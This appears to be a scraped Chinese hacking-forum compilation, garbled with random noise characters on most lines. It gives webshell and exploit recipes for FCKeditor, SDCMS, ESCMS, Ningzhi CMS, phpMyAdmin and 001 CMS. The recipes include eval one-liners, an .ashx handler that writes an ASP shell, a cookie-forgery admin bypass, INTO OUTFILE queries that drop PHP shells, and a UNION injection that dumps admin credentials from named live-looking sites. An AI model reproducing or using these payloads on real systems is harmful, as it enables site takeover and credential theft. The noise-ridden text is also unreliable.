* }! ?. h6 f( _' @2 c, ]http://xxoo.com/controls/fckedit ... aspx/connector.aspx
+ y) a: E8 w1 }; Q. G3 [( M跳转到网站根目录上传任意文件。% ?, @$ V! {8 a2 U
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件5 C" Z% ~. y3 N! n$ X. k: R+ }
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">1 m5 a+ m( q: p: o
Upload a new file:<br>
! v( ~% Y+ z7 d6 l<input type="file" name="NewFile" size="50"><br>
/ ?4 o' W3 f7 t% z' _<input id="btnUpload" type="submit" value="Upload">9 r2 Q, \& k: q) F0 h# A
</form>
* g3 \" u" O. P$ b: W. n-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! f# J. K8 n; l7 _
- u8 [% K) w3 D5 a" O3 _+ k$ z5 FSDcms 后台拿webshell
5 z. M3 D8 P) Y( }0 ]7 T' p6 {; s f& Y6 C. L# d
第一种方法:
: M) Z3 W& \8 {6 _5 y5 T- Q0 H- T进入后台-->系统管理-->系统设置-->系统设置->网站名称;
$ ^9 ]1 v( f* \! ~7 o把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx X/ w) @1 N3 k) b x. w6 W
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。1 ?/ _$ {; w2 ~+ |. f
第二种方法:1 n* c* A, o* z# a6 v
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
' o7 I: E3 b- i; r; f. H在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
& d! V' F7 K( F/ Z {6 ]3 I, |$ c第三种方法:9 H. M: B* l" y2 J; N: H7 D
进入后台-->界面管理-->模板文件管理-->创建文件; ~! N9 y0 J' Y7 k
文件名写入getshell.ashx
9 y y# w* t, O7 D5 U内容写入下面内容:: m" M2 r4 O( |1 d
/====================复制下面的=========================/9 ^/ }, n; T w3 S: e
<%@ WebHandler Language="C#" Class="Handler" %>1 t: u9 Q% W9 H2 S4 a) t0 H" G4 E
using System;' H' P+ p4 F$ U2 T) f }
using System.Web;
& h3 w* Q/ Q$ }% Z. [- musing System.IO;9 @5 a0 _) a* O6 L
public class Handler : IHttpHandler {' X0 J# Z& s" f7 Q
public void ProcessRequest (HttpContext context) {* I0 Q5 j# _0 O/ b6 B6 X9 ?& a0 t4 J
context.Response.ContentType = "text/plain";
+ ~/ |* [" ]/ W2 L9 AStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
! }, y2 d9 Q& x0 a" Q- B& Xfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");; N, [; c' U I
file1.Flush();& a, w7 S6 C$ | M# S
file1.Close();- ?& X5 }2 C: ?" i( \
}
7 e+ s4 ^! c' B Y) N6 C+ tpublic bool IsReusable {& W( [$ G" o3 d" b* _" `
get {" C% |9 r2 f" C& x
return false;3 f8 ~" G: q) |2 u$ Z4 P! W
}: T/ P8 p% z8 C4 ^2 K7 O
}$ _7 K' v. m, ^% j
}
( v1 x' A- ~$ ` ]3 R( t: X$ \% ]/=============================================/6 Q9 {$ b7 g+ C, j, ?6 x
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
& r3 f6 A! X6 D" o会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接0 k, W M. G. i k8 x, X: t
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 \( B7 ~; m. m4 Q# @7 n! X, u! I# X
$ u) S: ]8 S0 l3 i5 ~2 n! k8 M5 jESCMS网站管理系统0day9 |7 q, n* A1 t
' P s2 m' d$ q. j' E5 x* B后台登陆验证是通过admin/check.asp实现的2 W; J d. H3 j
1 ~) E: |7 D6 ^4 v- \' E: A0 Y
首先我们打开http://target.com/admin/es_index.html6 k5 s6 ~$ ]$ l, {
然后在COOKIE结尾加上+ N3 B" g; `, D. U& v
; ESCMS$_SP2=ES_admin=st0p;
" |# h4 S& D: {& v' e0 J修改,然后刷新2 \( f7 ]3 Y2 {6 Z3 j! T8 J
进后台了嘎..
4 H. \) w' }) H% x2 r& H" P/ @然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
4 T% f8 W0 Z' f" a; d! m6 i2 t3 ]8 m% H8 g5 |% H3 \
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.$ ^2 o% s. P; W! q1 S# e/ \
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
) N3 o( W& |$ b& L/ o存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
' l( [$ {' _6 g/ D8 r* ?% ~在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了. R" q s8 T; X) s5 P- c* m$ L) R& }
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! M7 C0 D- s( P# U: p! m, I. q( Z0 B$ y/ w2 M: ?" g+ b
宁志网站管理系统后台无验证漏洞及修复- v, B" @( o/ I3 [5 w
- t$ p, q( d {& ]9 U( O1 e! O
网上搜了一下,好像没有发布.如有雷同纯粹巧合!8 X! @$ `; F8 P6 n
官方网站:www.ningzhi.net) _( X% K: R4 @( K9 [" m
学校网站管理系统 V.2011版本
6 j" y: n W0 whttp://down.chinaz.com/soft/29943.htm
# O& X6 P' [. ^# u8 U: R其它版本(如:政府版等),自行下载.
+ O. }) a; Y4 T6 z. T漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~6 E1 P6 L% Y( ~
login.asp代码如下:% e- d& Z5 i1 w- z' m
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
1 X) x u. ^5 I( y7 Smanage.asp代码我就不帖出来了.反正也没验证.# Q5 U$ H7 m$ Z- w
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
/ X. y6 w) d6 W8 ?. C) L漏洞利用:
' ~6 r: p8 Y5 H; S! X" e直接访问http://www.0855.tv/admin/manage.asp4 X$ Z) K$ U f4 b9 k, A% j$ d# u
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
A0 i0 h; |+ e----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 A; M; n# t/ G# {% k9 ^+ V* P' B" `( ~# |) O7 X; \* M3 T
phpmyadmin拿shell的四种方法总结及修复
. c3 i. [2 U, f$ k8 @& L! t' T+ N1 u( ^9 o3 _/ ?# I8 X
方法一:
. G2 l$ @# o3 B& m7 x+ J6 N/ JCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
8 l& q* j: P% w8 ]! e% M. x' b: V# ?INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
! J# a8 X# c p! M% z$ Z; M6 E6 w# hSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
) _2 ~* X, X7 @& O----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php! R* ?5 e7 l$ u2 F" l3 Y2 \
一句话连接密码:7on
9 A, n1 K+ O& u0 x" p- _方法二:
* j6 {, k8 L2 P1 X读取文件内容: select load_file('E:/xamp/www/s.php');
8 j- L; r0 \ V/ r7 e3 T4 m写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'% J+ R" \9 W! s- V- s7 M1 j
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'( ?, J6 r! d1 H
方法三:7 P" y" T2 m# ~" A3 W& v) M
JhackJ版本 PHPmyadmin拿shell. y8 ^2 s5 R+ R0 I/ [
Create TABLE study (cmd text NOT NULL);" `' S& p* H, i- L- y o% ~0 c
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');9 m( ~) X5 F3 h+ _ E% A
select cmd from study into outfile 'E:/wamp/www/7.php';
) n% A0 }' @; Q( XDrop TABLE IF EXISTS study;
1 O1 j$ k# y5 j S<?php eval($_POST[cmd])?>2 a6 @) K5 g5 M1 k8 E0 l# Y3 u5 O
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。6 X* ?- d5 p0 q" _- d
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
1 i- K( R% g9 O' i+ U4 h) |SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1 r( Y. T, E# y ~+ _/ H, q- g. R
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
. ?) ~. n; Z7 Y: f: ^. D( p方法四:! ^4 z7 Z' M! a2 @8 |1 s" v8 d
select load_file('E:/xamp/www/study.php');) P- |6 w/ u" z$ ?- u
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'' v) v. X7 U* E" b# K7 v
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
6 H3 B; T; S4 Z0 u-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 M0 ?1 f: w! g
$ m+ T5 C. q' z" RNO.001中学网站管理系统 Build 110628 注入漏洞
3 J$ t' B' D% U1 C
7 s6 g( F i/ U; n5 P% VNO.001中学网站管理系统功能模块:1 r& {/ J: Q+ o3 \% t0 E" |
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等6 x2 C* c- `7 v7 U8 B: s7 T( ]0 w
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息: [- D9 [7 X; j+ p! ?: ?
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息9 h8 R4 G0 a# E- ^- p7 y
4.视频图片管理:一级分类,动态添加视频或者图片等信息
. j* P ], V# T7 ~! C a, n5.留言管理:对留言,修改,删除、回复等管理
5 \+ d1 \0 r/ {- r+ N2 b6.校友频道:包括校友资料excel导出、管理等功能; y( q4 ~8 I0 _9 e% {* x
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
8 }! \+ {4 [8 M$ P6 R" e, v默认后台:admin/login.asp
7 j* d1 p) X% A9 \% r官方演示:http://demo.001cms.net
" x! S4 }5 p3 {' S源码下载地址:http://down.chinaz.com/soft/30187.htm$ C0 S9 v! k* x
EXP:
0 P# [! w& f" ^& v4 [union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin( {" a$ R' X* i7 h: x" s- C6 O. ?
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
, R: F" R1 V! P9 egetshell:后台有备份,你懂的
! ` T& x. d( \8 y' z另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
: D+ A5 g5 N: }7 W. u0 J------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |